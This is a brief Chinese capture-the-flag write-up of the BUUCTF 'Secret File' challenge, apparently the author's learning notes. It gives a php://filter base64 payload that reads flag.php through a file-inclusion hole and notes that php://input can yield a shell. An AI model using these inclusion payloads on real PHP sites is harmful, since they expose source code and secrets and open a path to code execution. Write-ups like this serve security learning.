BUUCTF-Secret File wp
果然有,但是,我想看看action.PHP的页面,我记得kail里面好像有一个命令,是curl命令
-
打开kail
-
curl -v http://a6285cd6-6b8a-4e1e-af67-de206e88d610.node4.buuoj.cn:81/action.PHP
-
我怎么感觉到了局中局的感觉 ⊙﹏⊙
-
审查代码吧
就是?file=后面不能出现 ../ tp input data 大小写都不行
-
输入
?file=flag.PHP
-
-
f12看看,没有隐藏的内容
-
最终,去看了看大佬们的wp
-
学习到了PHP://filter伪协议
-
?file=PHP://filter/read=convert.base64-encode/resource=flag.PHP
-
# PHP://filter在双off的情况下可以使用 allow_url_fopen = off; allow_url_include = off; # 以前只知道PHP://input, 用post包接收数据(PHP代码),达到shell的作用。
-
要去学学PHP伪协议了
-
-
base64解码就行了
-
-
综上,一道文件包含题,用到了PHP://filter/read=convert.base64-encode/resource=...
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。